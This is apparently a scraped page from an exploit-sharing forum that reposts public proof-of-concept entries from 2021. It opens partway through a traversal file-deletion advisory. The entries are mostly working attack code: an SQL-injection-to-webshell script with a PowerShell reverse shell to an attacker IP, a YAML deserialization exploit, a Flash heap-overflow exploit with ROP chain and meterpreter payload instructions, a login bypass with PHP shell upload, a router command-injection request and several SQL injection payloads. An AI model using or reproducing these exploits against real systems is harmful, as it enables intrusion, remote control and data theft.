Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with an appropriate security codes can made adjustment or monitor the network control unit form any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building. #3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus. #4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obviously benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485. #5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc. Desc: The BAS controller suffers from an arbitrary file deletion vulnerability. Using the 'cfile' GET parameter in fmanerdel, attackers can delete arbitrary files on the affected device and cause denial of service scenario. Tested on: EMBED/1.0 Apache Tomcat/6.0.44 Apache Tomcat/6.0.18 Windows Server MySQL Version 5.1.60 MySQL Version 4.0.16 Version 2.0.1.28 20180628 Vulnerability discovered by Neurogenesia @zeroscience Advisory ID: ZSL-2021-5680 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5680.php 25.06.2021 -- Arbitrary File Deletion ----------------------- - Attacker can delete any file by abusing 'cfile' GET parameter in fmanerdel applet and using traversal sequence. Request: GET /fmanerdel?cfile=../secretFile.txt HTTP/1.1
  9. ISHACK AI BOT

    Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection # Date: 2021-08-13 # Exploit Author: mari0x00 # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 # Version: 1.0 # Tested on: Windows 10 + XAMPP #!/usr/bin/python3 import requests, socket, threading import base64, time, sys print(('''###########################################################''',"red")) print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red")) print(('''###########################################################''',"red")) print("") URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/' path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php' path = path.replace("\\", "\\\\") rhost = input("Provide attacker IP: ") or "127.0.0.1" rport = input("Provide attacker listening port: ") or "1337" # sending webshell payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''} requests.post(URL, data=payload) def shell(rhost, rport): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.bind((rhost, int(rport))) except socket.error as msg: print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1]) sys.exit() s.settimeout(5) s.listen(5) print('[+] Waiting for connection..') conn = False command='' while conn == False: try: conn, addr = s.accept() print("Got a connection from " + addr[0] + ":" + str(addr[1])) conn.send('\n'.encode()) time.sleep(1) print(conn.recv(0x10000).decode()) while(command != 'exit'): command=input('') conn.send((command + '\n').encode()) time.sleep(.3) res = conn.recv(0x10000) print(res.decode()) s.close() sys.exit("[!] Program exited") except socket.timeout: pass def start_shell(rhost, rport): revshell = "powershell -nop -NonI -W Hidden -Exec Bypass -c \"$client = New-Object System.Net.Sockets.TCPClient('" + rhost + "'," + rport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" revshell = revshell.encode('ascii') revshell = base64.b64encode(revshell) revshell = revshell.decode('ascii') connection = requests.get(URL+"/lol.php?cmd=" + revshell) print("[+] Starting to listen on port " + rport) time.sleep(0.5) threading.Thread(target=shell, args=(rhost, rport)).start() time.sleep(2) print("[+] Sending the reverse shell payload") threading.Thread(target=start_shell, args=(rhost, rport)).start()
  10. ISHACK AI BOT

    Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai # Date: 2021-09-11 # Exploit Author: Abhiram V # Vendor Homepage: https://parl.ai/ # Software Link: https://github.com/facebookresearch/ParlAI # Version: < 1.1.0 # Tested on: Linux # CVE: CVE-2021-24040 # References : # https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg # | https://anon-artist.github.io/blogs/blog3.html | ############################################################################ Introduction ParlAI (pronounced “par-lay”) is a free, open-source python framework for sharing, training and evaluating AI models on a variety of openly available dialogue datasets. ############################################################################ Vulnerability details ############################################################################ Description ParlAI was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitrary Code Execution. Proof of Concept Create the following PoC file (exploit.py) import os #os.system('pip3 install parlai') from parlai.chat_service.utils import config exploit = """!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')" """ open('config.yml','w+').write(exploit) config.parse_configuration_file('config.yml') Execute the python script ie, python3 exploit.py Impact Code Execution ############################################################################
  11. ISHACK AI BOT

    Adobe Flash Player - Integer Overflow

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    // Exploit Title: Adobe Flash Player - Integer Overflow // Exploit Author: Matteo Memelli (ryujin@offensive-security) // Date: 14/01/2017 // Original PoC: https://bugs.chromium.org/p/project-zero/issues/detail?id=323&can=1&q=Shader // CVE: CVE-2015-3104 // Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3104 package { import flash.display.*; import flash.utils.ByteArray; import flash.events.Event; import flash.events.MouseEvent; import flash.text.* import mx.utils.Base64Decoder; public class ShaderInputOverflow extends Sprite { public var bb:ByteArray = null; public var allocate:Array; public var MAX_ARRAY:uint = 81920; public var text:TextField = new TextField(); public var gText:String = ""; public var corrupted:uint = 0; public var corrupted_ba_address:uint = 0; public var corrupted_ba_pos:uint = 0; public var next_ba_address:uint = 0; public var NPSWF32Base:uint = 0; public function ShaderInputOverflow():void { if (stage) drawText(); else addEventListener(Event.ADDED_TO_STAGE, drawText); drawText(); var i:uint; allocate = new Array(); for (i = 0; i < MAX_ARRAY; i++) { bb = new ByteArray(); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); bb.writeByte(0x57); bb.writeByte(0x30); bb.writeByte(0x30); bb.writeByte(0x54); allocate.push(bb); } // We create "holes" of size 0x18 bytes on the heap i = MAX_ARRAY/2; while (i<MAX_ARRAY) { if (i % 2 != 0) { allocate[i] = null; } i++; } var ba:ByteArray = new ByteArray(); ba.writeByte(0xa1); // Define parameter? ba.writeByte(0x02); // Output. ba.writeByte(0x04); // Type: 4 floats. ba.writeByte(0x00); // 16-bit field, ?? ba.writeByte(0x01); ba.writeByte(0xff); // Mask. ba.writeByte(0x41); ba.writeByte(0x00); // Param name: 'A' ba.writeByte(0xa3); // Add texture? ba.writeByte(0x00); // Index? ba.writeByte(0x40); // 64 channels. ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x42); ba.writeByte(0x00); // Texture name: 'BBBB' ba.position = 0; var baOut:ByteArray = new ByteArray(); var baIn:ByteArray = new ByteArray(); // Overwrite ByteArray::Buffer Object capacity field with 0xffffffff // and the pointer to the data to 0x16000000 baIn.writeUnsignedInt(0x6230306e); baIn.writeUnsignedInt(0x6230306e); baIn.writeUnsignedInt(0x41414141); // ptr baIn.writeUnsignedInt(0x41414141); // 0x1 // Offset can be 0x10 bytes baIn.writeUnsignedInt(0x16000000); // ptr to data baIn.writeUnsignedInt(0xffffffff); // capacity baIn.writeUnsignedInt(0x16000000); // length / ptr to data // Another time in case the offset is 0x8 bytes baIn.writeUnsignedInt(0xffffffff); // capacity baIn.writeUnsignedInt(0xffffffff); // length var job:ShaderJob = new ShaderJob(); var shader:Shader = new Shader(); shader.byteCode = ba; shader.data.BBBB.width = 8192; shader.data.BBBB.height = 8192; shader.data.BBBB.input = baIn; job.target = baOut; job.width = 1; job.height = 1; job.shader = shader; // We need to catch the Error thrown by Flash to continue the execution // job.start triggers the copy that causes the heap overflow try { job.start(true); } catch (err:Error) { trace("w00t"); } var s:spray = new spray(); corrupted = findCorrupted(); allocate[corrupted].position = 0; gText += "The corrupted ByteArray object is at index " + corrupted.toString() + " of the 'allocate' array\n"; gText += "The length of the corrupted ByteArray is " + (allocate[corrupted].length).toString(16) + "\n"; findCorruptedAddress(); gText += "Corrupted ByteArray::Buffer object address 0x" + (corrupted_ba_address).toString(16) + "\n"; var NPSWF32Ptr:uint = readDword((corrupted_ba_address+0x18*2)); gText += "NPSWF32Ptr: 0x" + NPSWF32Ptr.toString(16) + "\n"; NPSWF32Base = findNPSWF32_Base(NPSWF32Ptr); gText += "NPSWF32Base Address: 0x" + NPSWF32Base.toString(16) + "\n"; // Look for the corrupted ByteArray::Buffer object address var tosearch:uint = corrupted_ba_address; gText += "Ptr to search: 0x" + tosearch.toString(16) + "\n"; var VTableObj:uint = findVTable(tosearch); gText += "VTable Address: 0x" + VTableObj.toString(16) + "\n"; updateText(); var methodEnvVtable:uint = readDword(VTableObj+0xd4); gText += "methodEnvVtable Address: 0x" + methodEnvVtable.toString(16) + "\n"; updateText(); // Crash on the Jitted pointer dereference that leads to code execution //writeDword((VTableObj+0xd4), 0x42424242); // Control the Jitted pointer dereference that leads to code execution writeROPChain(NPSWF32Base); // Decode and Write the files for the privilege escalation to memory var dll:ByteArray = new ByteArray(); var met:ByteArray = new ByteArray(); var dec1:Base64Decoder = new Base64Decoder(); var dec2:Base64Decoder = new Base64Decoder(); // sandbox exploit code dec1.decode("YOUR BASE64 PRIVESC SANDBOX ESCAPE DLL CODE HERE"); dll = dec1.toByteArray(); // msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=YOURIP -e generic/none -f exe > pwnd.exe // base64 pwnd.exe | tr --delete '\n' // Meterpreter executable or any other payload… dec2.decode("YOUR BASE64 METERPRETER CODE HERE"); met = dec2.toByteArray(); writeBytes(0x1a100000, met); writeBytes(0x1a200000, dll); writeDword((VTableObj+0xd4), 0x1a000000); gText += allocate[corrupted].toString(); } private function hexStringToByteArray(hexstring:String) : ByteArray { var bindata:ByteArray = new ByteArray(); bindata.endian = "littleEndian"; var hexstr:String = null; var count:uint = 0; while(count < hexstring.length) { hexstr = hexstring.charAt(count) + (hexstring.charAt(count + 1)); bindata.writeByte(parseInt(hexstr, 16)); count += 2; } return bindata; } private function writeROPChain(NPSWF32Base:uint):void { var ROPaddr:uint = 0x1a00CBE2; writeDword(0x1a000004, (NPSWF32Base+0x00418a60)); // PIVOT XCHG ECX,ESP... // Save stack information to restore the execution flow after shellcode writeDword(0x1a000000, (NPSWF32Base+0x00007324)); // POP EAX # RETN writeDword(ROPaddr, 0x1a000400); ROPaddr +=4 ; // SAVE ECX VALUE HERE writeDword(ROPaddr, (NPSWF32Base+0x0000268e)); ROPaddr +=4 ; // MOV [EAX],ECX # RETN writeDword(ROPaddr, (NPSWF32Base+0x00007324)); ROPaddr +=4 ; // POP EAX # RETN writeDword(ROPaddr, 0x1a000404); ROPaddr +=4 ; // SAVE EBX VALUE HERE writeDword(ROPaddr, (NPSWF32Base+0x000064c54)); ROPaddr +=4 ; // MOV [EAX],EBX # POP EBX # POP ECX; RETN writeDword(ROPaddr, 0x41414141); ROPaddr +=4 ; // JUNK writeDword(ROPaddr, 0x42424242); ROPaddr +=4 ; // JUNK // Mona Chain writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN writeDword(ROPaddr, (NPSWF32Base+0x0039cbea)); ROPaddr +=4 ; // POP EBP # RETN writeDword(ROPaddr, (NPSWF32Base+0x0077c1eb)); ROPaddr +=4 ; // POP EBX # RETN writeDword(ROPaddr, 0x00000201); ROPaddr +=4 ; writeDword(ROPaddr, (NPSWF32Base+0x007fff57)); ROPaddr +=4 ; // POP EDX # RETN writeDword(ROPaddr, 0x00000040); ROPaddr +=4 ; writeDword(ROPaddr, (NPSWF32Base+0x00b433a9)); ROPaddr +=4 ; // POP ECX # RETN writeDword(ROPaddr, (NPSWF32Base+0x00f7e6f5)); ROPaddr +=4 ; // &Writable location writeDword(ROPaddr, (NPSWF32Base+0x00b1ad8f)); ROPaddr +=4 ; // POP EDI # RETN writeDword(ROPaddr, (NPSWF32Base+0x00273302)); ROPaddr +=4 ; // ROP NOP # RETN writeDword(ROPaddr, (NPSWF32Base+0x006cb604)); ROPaddr +=4 ; // POP ESI # RETN writeDword(ROPaddr, (NPSWF32Base+0x0000d98f)); ROPaddr +=4 ; // JMP [EAX] writeDword(ROPaddr, (NPSWF32Base+0x002742d3)); ROPaddr +=4 ; // POP EAX # RETN writeDword(ROPaddr, (NPSWF32Base+0x00b7d364)); ROPaddr +=4 ; // ptr to VirtualProtect IAT writeDword(ROPaddr, (NPSWF32Base+0x00a4a349)); ROPaddr +=4 ; // PUSHAD # RETN writeDword(ROPaddr, (NPSWF32Base+0x0015fce4)); ROPaddr +=4 ; // PTR TO JMP ESP // NOPsled writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // nopsled writeDword(ROPaddr, 0x90909090); ROPaddr +=4 ; // shellcode var Shellcode:String = new String(); Shellcode += "..... YOUR SANDBOX EVASION SHELLCODE HERE ... "; writeBytes(ROPaddr, hexStringToByteArray(Shellcode)); ROPaddr += Shellcode.length/2; // Restore component // 1a00cc56 8b0d0004001a mov ecx,dword ptr ds:[1A000400h] // 1a00cc5c 8b1d0404001a mov ebx,dword ptr ds:[1A000404h] // 1a00cc62 28d9 sub cl,bl // 1a00cc64 87cc xchg ecx,esp // 1a00cc66 8bec mov ebp,esp // 1a00cc68 83c52c add ebp,2Ch // 1a00cc6b 31c0 xor eax,eax // 1a00cc6d c3 ret var Restore:String = new String(); Restore = "8b0d0004001a8b1d0404001a28d987cc8bec83c52c31c0c3"; writeBytes(ROPaddr, hexStringToByteArray(Restore)); ROPaddr += Restore.length/2; } private function findVTable(startAddress:uint):uint { // Find the VTable Object Address within the ByteArrayObject allocate[corrupted].endian = "littleEndian"; var addr:uint = 0; var base:uint = 0x16000000; var bstart:uint = base; var count:uint = 0; while (true) { if (readDword(base) == startAddress) { addr = bstart+count; // ByteArray::Buffer pointer is at offset +0x40 addr = addr - 0x40; // VTable Object pointer is at +0x8 return readDword(addr+0x8); } else { base += 4; count += 4; } } return addr; } private function findNPSWF32_Base(NPSWF32Ptr:uint):uint { // Find a DLL base address by appling the scan down technique var addr:uint = NPSWF32Ptr & 0xfffff000; while (true) { if (readDword(addr) == 0x00905a4d) { return addr; } else { addr = addr - 0x1000; } } return addr; } private function readDword(pAddress:uint):uint { // Read a DWORD from an address // by changing the ptr to array of bytes var tmpIndex:uint = 0; var res:uint = 0; // Change ptr to array of bytes tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(pAddress); allocate[corrupted].position = 0; // Read a DWORD from the new address res = allocate[corrupted].readUnsignedInt(); // Reset ptr to array of bytes to 0x16000000 tmpIndex = (corrupted_ba_address + 0x8) - pAddress; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(0x16000000); return res; } private function writeDword(pAddress:uint, value:uint):void { // write a DWORD to an address // by changing the ptr to array of bytes var tmpIndex:uint = 0; // Change ptr to array of bytes tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(pAddress); allocate[corrupted].position = 0; // Read a DWORD from the new address allocate[corrupted].writeUnsignedInt(value); // Reset ptr to array of bytes to 0x16000000 tmpIndex = (corrupted_ba_address + 0x8) - pAddress; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(0x16000000); } private function writeBytes(pAddress:uint, data:ByteArray):void { // write a ByteArray to an address // by changing the ptr to array of bytes var tmpIndex:uint = 0; // Change ptr to array of bytes tmpIndex = (corrupted_ba_address + 0x8) - 0x16000000; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(pAddress); allocate[corrupted].position = 0; // Read a ByteArray tp the new address allocate[corrupted].writeBytes(data, 0, 0); // Reset ptr to array of bytes to 0x16000000 tmpIndex = (corrupted_ba_address + 0x8) - pAddress; allocate[corrupted].position = tmpIndex; allocate[corrupted].writeUnsignedInt(0x16000000); } private function findCorruptedAddress():void { allocate[corrupted].position = 0; allocate[corrupted].endian = "littleEndian"; while (true) { if(allocate[corrupted].readUnsignedInt() == 0x6230306e) { if(allocate[corrupted].readUnsignedInt() == 0x6230306e) { // Corrupted Object starts just after the second 0x6230306e tag in case the offset is 0x10 // otherwise after the two 0x41414141 dwords in case the offset is 0x8 // OFFSET 0x10 LENGTH = 0x16000000 if (allocate[corrupted].length == 0x16000000) corrupted_ba_pos = allocate[corrupted].position; // OFFSET 0x8 LENGTH = 0xffffffff else corrupted_ba_pos = allocate[corrupted].position + 0x8; // We calculate the address of the corrupted object by using the index // and the base address that we set through the heap overflow. corrupted_ba_address = 0x16000000 + corrupted_ba_pos; // Since every in-use ByteArray object is alternated with a free one // (we created the holes), the next in-use ByteArray is at 0x18*2 bytes // from the corrupted one. next_ba_address = corrupted_ba_address + 0x18*2; return; } } } return; } private function findCorrupted():uint { // Find the corrupted ByteArray::Buffer object. // We can find it by checking for a size different from the // original 0x10 bytes, since the ByteArray data is 16 bytes // for all the objects we allocated, except the corrupted one. var i:uint = MAX_ARRAY/2; while (i<MAX_ARRAY) { if (i % 2 == 0) { if(allocate[i].length != 0x10) { return i; } } i++; } return 0; } public function updateText(e:Event = null):void { text.text = gText; } public function drawText(e:Event = null):void { removeEventListener(Event.ADDED_TO_STAGE, drawText); text.text = gText; text.width = 300; text.height = 100; text.x = 10; text.y = 10; text.multiline = true; text.wordWrap = true; text.background = true; text.border = true; var format:TextFormat = new TextFormat(); format.font = "Verdana"; format.color = 0xff0000; format.size = 8; text.defaultTextFormat = format; addChild(text); text.addEventListener(MouseEvent.MOUSE_DOWN, mouseDownScroll); } public function mouseDownScroll(event:MouseEvent):void { text.scrollV++; } } } import flash.display.MovieClip; import flash.utils.*; class spray extends MovieClip { public var allocate:Array; public function spray() { HeapSpray(); } public function HeapSpray() : void { var chunk_size:uint = 1048576; // 0x100000 var block_size:uint = 65536; // 0x10000 var heapblocklen:uint = 0; var spraychunks:uint = 0; var heapblock1:ByteArray; var heapblock2:ByteArray; var heapblock3:ByteArray; heapblock1 = new ByteArray(); heapblock1.endian = Endian.LITTLE_ENDIAN; heapblock1.writeInt(0x41424344); heapblocklen = heapblocklen + 4; while(heapblocklen < block_size) { heapblock1.writeByte(0x0d); // padding to 64K heapblocklen = heapblocklen + 1; } heapblock2 = new ByteArray(); while(heapblock2.length < chunk_size) { heapblock2.writeBytes(heapblock1, 0, heapblock1.length); } allocate = new Array(); // 600MB spray while(spraychunks < 50) { heapblock3 = new ByteArray(); heapblock3.writeBytes(heapblock2, 0, heapblock2.length); allocate.push(heapblock3); spraychunks = spraychunks + 1; } } }
  12. ISHACK AI BOT

    Purchase Order Management System 1.0 - Remote File Upload

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Purchase Order Management System 1.0 - Remote File Upload # Date: 2021-09-14 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html # Version: v1.0 # Tested on: Windows 10 - XAMPP Server # [ About the Purchase Order Management System ] : #This Purchase Order Management System can store the list of all company's, #suppliers for easily retrieving the suppliers' data upon generating the purchase order. #It also stores the list of Items that the company possibly purchased from their suppliers. #Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. #Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request. #!/bin/env python3 import requests import time import sys from colorama import Fore, Style if len(sys.argv) !=2: print (''' ########################################################### #Purchase Order Management System 1.0 - Remote File Upload# # BY:Aryan Chehreghani # # Team:TAPESH DIGITAL SECURITY TEAM IRAN # # mail:[email protected] # # -+-USE:python script.py <target url> # # [+]Example:python3 script.py http://127.0.0.1/ # ########################################################### ''') else: try: url = sys.argv[1] print() print('[*] Trying to login...') time.sleep(1) login = url + '/classes/Login.php?f=login' payload_name = "shell.php" payload_file = r"""<?php @system($_GET['tapesh']); ?>""" session = requests.session() post_data = {"username": "'=''or'", "password": "'=''or'"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() if user_login.text == '{"status":"success"}': print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!') upload_url = url + "/classes/Users.php?f=save" cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"} data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n" print('[*] Trying to shell...') time.sleep(2) try: print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!') upload = session.post(upload_url, headers=headers, cookies=cookie, data=data) upload_check = f'{url}/uploads' r = requests.get(upload_check) if payload_name in r.text: payloads = r.text.split('<a href="') for load in payloads: if payload_name in load: payload = load.split('"') payload = payload[0] else: pass else: exit() except: print ("Upload failed try again\n") exit() try: print("Check Your Target ;)\n") except: print("Failed to find shell\n") else: print("Login failed!\n") except: print("Something Went Wrong!\n") ######################################################### #FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir
  13. ISHACK AI BOT

    Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated) # Date: 2021-09-15 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29 # Version: All Version # Tested on: Windows 10 Enterprise x64 , Linux # [ About - Seowon 130-SLC router ] : #The SLC-130 series are all-in-one LTE CPE that delights you in handling multi-purpose environments that require data and WiFi, #Its sophisticated and stable operation helps you excel yourself at office and home, #Improve communication with excellence and ease your life. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the request #The result of the request is visible on the browser page # [ Sample RCE Request ] : POST / HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919 Content-Length: 183 Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin Connection: keep-alive Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
  14. ISHACK AI BOT

    Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated) # Date: 29.08.2021 # Exploit Author: John Jefferson Li <[email protected]> # Vendor Homepage: https://board.support/ # Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 # Version: 3.3.3 # Tested on: Ubuntu 20.04.2 LTS ----- PoC 1: Error Based SQLi (status_code) ----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: status_code (POST) function=new-conversation&status_code=2"+AND+EXTRACTVALUE(4597,CONCAT("","DB+Name:+",(SELECT+(ELT(4597=4597,""))),database()))+AND+"fKoo"="fKoo&title=&department=&agent_id=&routing=false&login-cookie=&user_id=46&language=false ----- PoC 2: Error Based SQLi (department)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: department (POST) function=new-conversation&status_code=2o&title=&department=(UPDATEXML(5632,CONCAT(0x2e,"Database+Name:+",(SELECT+(ELT(5632=5632,""))),database()),3004))&agent_id=&routing=false&login-cookie=&user_id=46&language=false ----- PoC 3: Error Based SQLi (user_id) ----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: user_id (POST) function=send-message&user_id=-5"+AND+GTID_SUBSET(CONCAT("Database+Name:+",(SELECT+(ELT(3919=3919,""))),database()),3919)+AND+"wrOJ"="wrOJ&conversation_id=35&message=TEST+POC&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false ----- PoC 4: Time Based SQLi (conversation_id)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_id (POST) function=send-message&user_id=5&conversation_id=45"+AND+(SELECT 1479+FROM+(SELECT(SLEEP(5)))xttx)--+BOXv&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false&login-cookie=&language=false ----- PoC 5: Time Based SQLi (conversation_status_code)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: conversation_status_code (POST) function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false+WHERE+9793=9793+AND+(SELECT+4500+FROM+(SELECT(SLEEP(5)))oJCl)--+uAGp&queue=false&payload=false&recipient_id=false&login-cookie=&language=false ----- PoC 6: Time Based SQLi (recipient_id)----- Request POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1 Vulnerable Parameter: recipient_id (POST) function=send-message&user_id=5&conversation_id=45&message=test+&conversation_status_code=false&queue=false&payload=false&recipient_id=false+AND+(SELECT+7416+FROM+(SELECT(SLEEP(5)))eBhm)&login-cookie=&language=false
  15. ISHACK AI BOT

    Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
